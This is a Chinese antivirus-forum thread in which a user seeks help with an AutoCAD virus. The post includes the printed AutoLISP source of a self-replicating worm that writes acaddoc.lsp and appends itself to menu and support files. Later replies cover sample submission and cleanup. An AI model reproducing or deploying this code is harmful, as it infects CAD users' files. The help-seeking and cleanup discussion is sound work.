微点交流论坛
» 游客:  注册 | 登录 | 帮助

 

作者:
标题: CAD病毒无法查出来
木叶飞鸿
新手上路





积分 2
发帖 2
注册 2010-7-4
#1  CAD病毒无法查出来

记得之前能够发现CAD病毒的*.fas类型的。但是最近有个ACADDOC.FAS就不行了,一直能看到,每次打开一个CAD文件都生成一个ACADDOC.FAS。手动删除了,只要再打开CAD文件,还是会出现,而且微点也静默状态了。我把该文件和之前查杀的CAD的病毒记录放到附件,请技术人员查看。或者给出个解决办法。谢谢!

病毒内容:

(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
  (setq flag nil)
  (setq flag1 t)
  (if (findfile target)
    (progn
      (setq wjm1 (open target "r"))
      (while (setq text (read-line wjm1))
        (if (= text bz) (setq flag1 nil))
        );while
      (close wjm1)
      );progn
    );if
  (if flag1
    (progn
      (setq wjm (open source "r"))
      (setq wjm1 (open target "a"))
      (write-line (chr 13) wjm1)
      (while (setq text (read-line wjm))
        (if (= text bz) (setq flag t))
        (if flag
          (progn
            (write-line text wjm1)
            );progn
          );if
        );while
      (close wjm1)
      (close wjm)
      );progn
    );if
  );defun
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "acaddoc.lsp")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
  (progn
    (setq acaddocpath (vl-filename-directory dwgpath))
    (setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))
    (setq mnln 0)
    (while (< mnln mnlnum)
      (setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))
      (app mnlfilename acaddocfile bz)
      (app acaddocfile mnlfilename bz)
      (setq mnln (1+ mnln))
      );while
    (setq lspn 0)
    (while (< lspn lspnum)
      (setq lspfilename (strcat support "\\" (nth lspn lspfilelist)))
      (app lspfilename acaddocfile bz)
      (app acaddocfile lspfilename bz)
      (setq lspn (1+ lspn))
      );while
    );progn
  );if
(setq mnln 0)
(while (< mnln mnlnum)
  (setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))
  (setq mnln1 0)
  (while (< mnln1 mnlnum)
    (setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))
    (app mnlfilename mnlfilename1 bz)
    (setq mnln1 (1+ mnln1))
    );while
  (setq lspn1 0)
  (while (< lspn1 lspnum)
    (setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))
    (app mnlfilename lspfilename1 bz)
    (setq lspn1 (1+ lspn1))
    );while
  (setq mnln (1+ mnln))
  );while
(setq lspn 0)
(while (< lspn lspnum)
(load "acadappp.lsp")
(princ)

附件 1: 病毒记录.gif (2013-10-17 08:49, 8.03 K,下载次数: 171)


※ ※ ※ 本文纯属【木叶飞鸿】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2013-10-17 08:49
查看资料  发送邮件  发短消息   编辑帖子
Legend
超级版主

超级版主



积分 77171
发帖 70170
注册 2005-10-29
#2  

请楼主将近期出现的cad样本发给我们virus@micropoint.com.cn,我们分析后会及时处理,谢谢。

※文章所有权归【Legend】与【东方微点论坛】共同所有,转载请注明出处!※

微点官方认证新浪微博:欢迎进入 微点新浪微博
微点技术支持邮箱: support@micropoint.com.cn
给Legend发短消息
2013-10-17 08:53
查看资料  发短消息   编辑帖子
木叶飞鸿
新手上路





积分 2
发帖 2
注册 2010-7-4
#3  

我用金山的CAD专杀和KillVirus一起用灭掉了。金山的CAD专杀不能解决,之后用KillVirus扫描出两个文件,删除后就好了。不过电脑接连出现几次explorer重启。目前打开CAD正常了,只剩下
; 错误: 参数类型错误: stringp nil

AutoCAD 菜单实用程序已加载。; 错误: 参数类型错误: stringp nil。
应该是残留了。下次出了问题再直接发送样本。

※ ※ ※ 本文纯属【木叶飞鸿】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2013-10-18 13:09
查看资料  发送邮件  发短消息   编辑帖子
smomo
注册用户





积分 146
发帖 141
注册 2008-1-6
#4  

这个病毒修改acad.mnl文件(菜单文件),代码里面有,如果光清除*.lsp文件,不清除菜单里面的代码,还会重新生成的。

※ ※ ※ 本文纯属【smomo】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2014-8-19 21:54
查看资料  发送邮件  发短消息  QQ   编辑帖子



论坛跳转:

可打印版本 | 推荐 | 订阅 | 收藏


[ 联系我们 - 东方微点 ]


北京东方微点信息技术有限责任公司 福建东方微点信息安全有限责任公司

闽ICP备05030815号